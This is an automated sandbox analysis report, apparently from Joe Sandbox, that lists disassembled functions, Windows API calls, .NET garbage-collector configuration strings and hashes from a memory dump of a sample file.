System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF67DCC3F1F
GCEnableSpecialRegions, xrefs: 00007FF67DCC3CFB
BGCFLSmoothFactor, xrefs: 00007FF67DCC3DCD
BGCMemGoalSlack, xrefs: 00007FF67DCC3D3A
gcServer, xrefs: 00007FF67DCC39A2
GCHeapHardLimitSOH, xrefs: 00007FF67DCC3EA4
BGCG2RatioStep, xrefs: 00007FF67DCC3E8A
BGCFLkd, xrefs: 00007FF67DCC3DA3
System.GC.HeapHardLimitPOH, xrefs: 00007FF67DCC3ED1
GCCpuGroup, xrefs: 00007FF67DCC3AC4
BGCFLkp, xrefs: 00007FF67DCC3D79
GCBreakOnOOM, xrefs: 00007FF67DCC3A33
System.GC.HeapCount, xrefs: 00007FF67DCC3B66
gcForceCompact, xrefs: 00007FF67DCC39F8
GCHeapHardLimitSOHPercent, xrefs: 00007FF67DCC3EF2
BGCMLki, xrefs: 00007FF67DCC3E0C
System.GC.HeapHardLimitLOH, xrefs: 00007FF67DCC3EB7
BGCMLkp, xrefs: 00007FF67DCC3DF7
GCLOHThreshold, xrefs: 00007FF67DCC3B29
BGCFLki, xrefs: 00007FF67DCC3D8E
BGCFLEnableKi, xrefs: 00007FF67DCC3E21
BGCFLGradualD, xrefs: 00007FF67DCC3DE2
GCGen1MaxBudget, xrefs: 00007FF67DCC3C5E
BGCFLEnableFF, xrefs: 00007FF67DCC3E75
GCRegionRange, xrefs: 00007FF67DCC3CD1
GCLogEnabled, xrefs: 00007FF67DCC3A6E
BGCFLSweepGoalLOH, xrefs: 00007FF67DCC3D64
System.GC.ConserveMemory, xrefs: 00007FF67DCC3F4E
GCNumaAware, xrefs: 00007FF67DCC3AA4
System.GC.Concurrent, xrefs: 00007FF67DCC39BB
GCHeapAffinitizeMask, xrefs: 00007FF67DCC3C05
BGCSpinCount, xrefs: 00007FF67DCC3B3E
GCRegionSize, xrefs: 00007FF67DCC3CE6
GCLogFileSize, xrefs: 00007FF67DCC3BD6
BGCFLEnableTBH, xrefs: 00007FF67DCC3E60
GCRetainVM, xrefs: 00007FF67DCC3A18
GCEnabledInstructionSets, xrefs: 00007FF67DCC3F3B
GCLatencyLevel, xrefs: 00007FF67DCC3BC1
GCConfigLogEnabled, xrefs: 00007FF67DCC3A89
GCTotalPhysicalMemory, xrefs: 00007FF67DCC3CBC
BGCFLEnableKd, xrefs: 00007FF67DCC3E36
GCLatencyMode, xrefs: 00007FF67DCC3BAC
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF67DCC3F05
BGCFLEnableSmooth, xrefs: 00007FF67DCC3E4B
System.GC.LargePages, xrefs: 00007FF67DCC3ADD
BGCFLff, xrefs: 00007FF67DCC3DB8
BGCFLSweepGoal, xrefs: 00007FF67DCC3D4F
System.GC.HeapHardLimitPercent, xrefs: 00007FF67DCC3CA0
GCLowSkipRatio, xrefs: 00007FF67DCC3C73
System.GC.HeapAffinitizeMask, xrefs: 00007FF67DCC3BFE
GCHeapHardLimitPercent, xrefs: 00007FF67DCC3CA7
GCHeapHardLimitLOHPercent, xrefs: 00007FF67DCC3F0C
System.GC.Server, xrefs: 00007FF67DCC399B
GCWriteBarrier, xrefs: 00007FF67DCC3F6A
GCHeapHardLimitLOH, xrefs: 00007FF67DCC3EBE
BGCMemGoal, xrefs: 00007FF67DCC3D25
GCgen0size, xrefs: 00007FF67DCC3B82
BGCFLTuningEnabled, xrefs: 00007FF67DCC3D10
System.GC.HighMemoryPercent, xrefs: 00007FF67DCC3C18
GCLOHCompact, xrefs: 00007FF67DCC3B14
GCHighMemPercent, xrefs: 00007FF67DCC3C1F
gcConservative, xrefs: 00007FF67DCC39DD
GCGen0MaxBudget, xrefs: 00007FF67DCC3C49

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
API String ID: 0-2080704861
Opcode ID: 4800937efbc33c061aba5a48662b238fc7ecf762881e21f62eb9c76b00006de6
Instruction ID: e81d5dc53b0664406d94a73d059306c4b17a514af4ab7a26f6c940ca782f523f
Opcode Fuzzy Hash: 4800937efbc33c061aba5a48662b238fc7ecf762881e21f62eb9c76b00006de6
Instruction Fuzzy Hash: DDF18466E3898BA0F742DB66E8510F82365AF95344F854E73D00DD70B6BE3CE24AC761

Function 00007FF67DCC2B00 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF67DCC2B3C
GetCurrentProcess.KERNEL32 ref: 00007FF67DCC2B64
OpenProcessToken.ADVAPI32 ref: 00007FF67DCC2B77
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF67DCC2B9C
GetLastError.KERNEL32 ref: 00007FF67DCC2BA4
CloseHandle.KERNEL32 ref: 00007FF67DCC2BB1
GetLargePageMinimum.KERNEL32 ref: 00007FF67DCC2BC6
VirtualAlloc.KERNEL32 ref: 00007FF67DCC2BF7
GetCurrentProcess.KERNEL32 ref: 00007FF67DCC2C03
VirtualAllocExNuma.KERNEL32 ref: 00007FF67DCC2C23

Strings

SeLockMemoryPrivilege, xrefs: 00007FF67DCC2B35

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
String ID: SeLockMemoryPrivilege
API String ID: 1752251271-475654710
Opcode ID: 6efe4589b0769a308082a9ad12be656a71ec973b7c0ed8a2fddab75d5050e98b
Instruction ID: c3c109c60c14367ca66af9f0e760f8c4322058fbc32afbbe5f1dd075469a8d3b
Opcode Fuzzy Hash: 6efe4589b0769a308082a9ad12be656a71ec973b7c0ed8a2fddab75d5050e98b
Instruction Fuzzy Hash: E731A637A2C68286FB219F61B81437A77A5EB847D4F004A35DA8E87794EE3DD1558B00

Function 00007FF67DCB8130 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB81BB
RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB831A
RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB8410
RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB8426
RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB8486

Strings

[ KeepUnwinding ], xrefs: 00007FF67DCB843A

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: [ KeepUnwinding ]
API String ID: 2546344036-400895726
Opcode ID: dab291b85a8ce5d589c2bd9b116d5d2e693857a81769f322aec2306361bfc59e
Instruction ID: 9fcd8aaa14e356d63bd1afe3f3bdf2e5f9606c3e823c481b0a7b96f0d780e17e
Opcode Fuzzy Hash: dab291b85a8ce5d589c2bd9b116d5d2e693857a81769f322aec2306361bfc59e
Instruction Fuzzy Hash: 78C18F73A19B42C1EB558F25E5502A933B9FF44B58F18463ACE4D8B398EF39E486C710

Function 00007FF67DD195DC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF67DD19608
GetCurrentThreadId.KERNEL32 ref: 00007FF67DD19616
GetCurrentProcessId.KERNEL32 ref: 00007FF67DD19622
QueryPerformanceCounter.KERNEL32 ref: 00007FF67DD19632

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 117093f8d48222a74511d4297b00894299081f1a55061830870522c5ba379115
Instruction ID: 19da45515222b6dd1ceb93a6024168004c7a01d50b6a2c3f428c45e8ab9a6ab8
Opcode Fuzzy Hash: 117093f8d48222a74511d4297b00894299081f1a55061830870522c5ba379115
Instruction Fuzzy Hash: 4E112E22B24F418AEB40DF60E8552B833A4FB59758F441E31DA6D87BA4EF7CE1A4C340

Function 00007FF67DCB5490 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF67DCB57A1

Strings

The required instruction sets are not supported by the current CPU., xrefs: 00007FF67DCB578E

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: The required instruction sets are not supported by the current CPU.
API String ID: 2546344036-3318624164
Opcode ID: f618e1b964131593879fc6ef3cc786b0ff1d489d28f5c64add1a197e72f52fd0
Instruction ID: e601f357ccb515eaedd140ad349c6f1e4055818c2e4b13ec6e989720cf757b85
Opcode Fuzzy Hash: f618e1b964131593879fc6ef3cc786b0ff1d489d28f5c64add1a197e72f52fd0
Instruction Fuzzy Hash: AB714073F3C2A68AF724CB19A44593966A96F61354F900E38D50ECBED1FD2EF8524B04

Function 00007FF67DCDDEA0 Relevance: 2.0, APIs: 1, Instructions: 456COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67DCC1F30: CreateEventW.KERNEL32 ref: 00007FF67DCC1F71

Part of subcall function 00007FF67DCC2900: QueryPerformanceCounter.KERNEL32 ref: 00007FF67DCC2909

DebugBreak.KERNEL32 ref: 00007FF67DCDE65A

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: BreakCounterCreateDebugEventPerformanceQuery
String ID:
API String ID: 4239280443-0
Opcode ID: 31cf48b61cf1ce4dbab0a6b664b4d7c0e05dddb5d7e5ab2a0916dd3adb355843
Instruction ID: 09e12cea7697b43324ceb740826cf4db1f08331ccd44488b3e7ac78e7bcf15f9
Opcode Fuzzy Hash: 31cf48b61cf1ce4dbab0a6b664b4d7c0e05dddb5d7e5ab2a0916dd3adb355843
Instruction Fuzzy Hash: 8542D573928BC285E644CB34BC8026837A8FB98744F565B39D98CA3765FF7CA1A1D701

Function 00007FF67DCE1A70 Relevance: 1.9, Strings: 1, Instructions: 621COMMON

Download Yara Rule

Strings

, xrefs: 00007FF67DCE204C

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 702d9e7e669e9ba2a144e5b8aea13f5e9f2ed0e32e4e8ade29524c6219cc69f2
Instruction ID: 9ed0ff00bc6e1729f701a12dd04d8b78b2856ff0030f640e523f125354d3cf5d
Opcode Fuzzy Hash: 702d9e7e669e9ba2a144e5b8aea13f5e9f2ed0e32e4e8ade29524c6219cc69f2
Instruction Fuzzy Hash: 6C52B1B3A28BC686EA11CF25E84127977A9FB457A4F450B35DA5E83790EF3CE451C301

Function 00007FF67DCD8180 Relevance: 1.7, Strings: 1, Instructions: 481COMMON

Download Yara Rule

Strings

========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF67DCD896B

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
API String ID: 0-2256439813
Opcode ID: 42bf1560006a13b0a7c827c9a04a10aa9f2241fbadd663d7076ebba3c9ba8673
Instruction ID: adf6e53a69e9c7daf7323ce0cebbf579fbd68d0ac46047505de76401d3673214
Opcode Fuzzy Hash: 42bf1560006a13b0a7c827c9a04a10aa9f2241fbadd663d7076ebba3c9ba8673
Instruction Fuzzy Hash: 05429233A29BC686EA45CB29E94037877A4FF44744F258A36CA4D87361EF3DE062C301

Function 00007FF67DCCE560 Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF67DCCE5AE

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: 34c0dc251892f11cf7d9e199c7ff66380f72b36936934ca171ea1f48237259aa
Instruction ID: a6c105aab2a20ccaaed1e0c93da1aa867e0d1dda1c5d300dd06c08e9f7c895ff
Opcode Fuzzy Hash: 34c0dc251892f11cf7d9e199c7ff66380f72b36936934ca171ea1f48237259aa
Instruction Fuzzy Hash: BD12BE73A29A8282EA10CB15E4446B967ADFB46B94F144B32DF5D877D4EF3CE482D700

Function 00007FF67DCE2970 Relevance: .9, Instructions: 945COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33924abe3f42c54ee12be418d667e73a0a90b33c06acae2a44cfa7a1fecb1de
Instruction ID: cba72663bb88f5217b46379a74f408739da30d64e33dadf754c69f3c3c4975fc
Opcode Fuzzy Hash: d33924abe3f42c54ee12be418d667e73a0a90b33c06acae2a44cfa7a1fecb1de
Instruction Fuzzy Hash: 8592C2A3E39B8685EA019B25A9517B4A7A9BF45BC4F154B36D90ED3360FF3DF4428300

Function 00007FF67DCE3870 Relevance: .6, Instructions: 626COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac5ee575158c561d5d2a4f28f2664afc57fdc3645f25469010ebbf959737b059
Instruction ID: 0c453df4f7edfbfa2da246208967d46d301e5489ff1fc987d8c001feefb99514
Opcode Fuzzy Hash: ac5ee575158c561d5d2a4f28f2664afc57fdc3645f25469010ebbf959737b059
Instruction Fuzzy Hash: 844280B3B28B9586EB108B65E4411AD77B5FB44BC8F141A35EE4D97B98EE3CE442C700

Function 00007FF67DCE41E0 Relevance: .6, Instructions: 583COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f096069f9d4ed4ea6c4d8b84aa161e205579bef809260cba1ebab1ce8cdc0b7
Instruction ID: 400df4df60791e14ff51c90648163df84eb12eea365d0a8d1f582294794346f9
Opcode Fuzzy Hash: 9f096069f9d4ed4ea6c4d8b84aa161e205579bef809260cba1ebab1ce8cdc0b7
Instruction Fuzzy Hash: 473272B3F2DB9585EB10CF75D4012AC27B9AB44798F154A36CE0D9BB98EE38E456C340

Function 00007FF67DCD0010 Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dcfc29c500fd793c30ae6df29eb4cbf164e5484d9a9cb05eb12e02bb22df5e4
Instruction ID: cf80c7618c50f1baaceb8bb847a6d618e8524547be8ef96b0b9a7ed6807f43e7
Opcode Fuzzy Hash: 5dcfc29c500fd793c30ae6df29eb4cbf164e5484d9a9cb05eb12e02bb22df5e4
Instruction Fuzzy Hash: 5002C573B68A8586FA148F69E84067C37A4EB40BA4F548B31CA6D977D4EF3CE442D701

Function 00007FF67DCCFA64 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

